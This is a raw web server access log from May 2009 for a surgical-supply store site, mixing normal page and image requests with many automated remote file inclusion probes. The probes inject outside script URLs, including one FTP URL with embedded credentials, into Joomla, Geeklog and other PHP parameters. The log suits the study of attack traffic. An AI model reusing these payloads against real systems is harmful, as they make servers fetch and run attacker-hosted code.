81.196.124.252 - - [16/May/2009:01:35:11 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
60.249.1.56 - - [16/May/2009:01:35:12 -0400] "GET //viewbody.html?code=http://stop-op.com/cfg/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
60.249.1.56 - - [16/May/2009:01:35:12 -0400] "GET /logs//viewbody.html?code=http://stop-op.com/cfg/id.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
60.249.1.56 - - [16/May/2009:01:35:13 -0400] "GET /logs/access_log.Q108121900//viewbody.html?code=http://stop-op.com/cfg/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
81.196.124.252 - - [16/May/2009:01:35:16 -0400] "GET /logs/access_log.Q108112200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
81.196.124.252 - - [16/May/2009:01:35:27 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
81.196.124.252 - - [16/May/2009:01:35:27 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
81.196.124.252 - - [16/May/2009:01:35:27 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
81.196.124.252 - - [16/May/2009:01:35:32 -0400] "GET /logs/access_log.Q108112200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
76.175.45.187 - - [16/May/2009:01:35:40 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0 HTTP/1.1" 200 56583 "http://www.acesurgical.com/ubs_tips.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:42 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:42 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:42 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:42 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:43 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:43 -0400] "GET /images/items/2881000_THUMB.JPG HTTP/1.1" 200 3673 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:43 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:43 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:43 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:43 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:43 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:43 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:43 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:43 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:43 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:43 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.43.48.5 - - [16/May/2009:01:35:43 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:43 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
76.175.45.187 - - [16/May/2009:01:35:43 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
190.144.44.36 - - [16/May/2009:01:36:01 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
190.144.44.36 - - [16/May/2009:01:36:01 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
80.175.200.42 - - [16/May/2009:01:36:12 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.175.200.42 - - [16/May/2009:01:36:12 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
80.175.200.42 - - [16/May/2009:01:36:13 -0400] "GET /logs/access_log.Q108090800/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
80.175.200.42 - - [16/May/2009:01:36:13 -0400] "GET /logs/access_log.Q108092000/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:01:36:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.196.124.252 - - [16/May/2009:01:36:56 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://free-merchant-account.investstores.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
74.52.164.18 - - [16/May/2009:01:36:58 -0400] "GET /logs/access_log.Q108083000//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:36:58 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:36:58 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
60.249.1.56 - - [16/May/2009:01:36:59 -0400] "GET /logs/error_log.Q108121900//viewbody.html?code=http://stop-op.com/cfg/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
74.52.164.18 - - [16/May/2009:01:37:05 -0400] "GET /logs/access_log.Q108082100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:37:18 -0400] "GET /logs/access_log.Q108083000//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:37:18 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:37:18 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
74.52.164.18 - - [16/May/2009:01:37:22 -0400] "GET /logs/access_log.Q108082100//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
87.230.85.142 - - [16/May/2009:01:37:25 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
87.230.85.142 - - [16/May/2009:01:37:26 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
87.230.85.142 - - [16/May/2009:01:37:26 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
72.3.226.56 - - [16/May/2009:01:37:27 -0400] "GET /logs/access_log.Q108111500%20//help.php?css_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
72.3.226.56 - - [16/May/2009:01:37:27 -0400] "GET //help.php?css_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
72.3.226.56 - - [16/May/2009:01:37:27 -0400] "GET /logs//help.php?css_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
87.230.85.142 - - [16/May/2009:01:37:31 -0400] "GET /logs/access_log.Q108112200/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
91.121.210.42 - - [16/May/2009:01:37:32 -0400] "GET /logs/access_log.Q108111500%20//help.php?css_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.121.210.42 - - [16/May/2009:01:37:32 -0400] "GET /logs//help.php?css_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
91.121.210.42 - - [16/May/2009:01:37:32 -0400] "GET //help.php?css_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
190.144.44.36 - - [16/May/2009:01:37:34 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
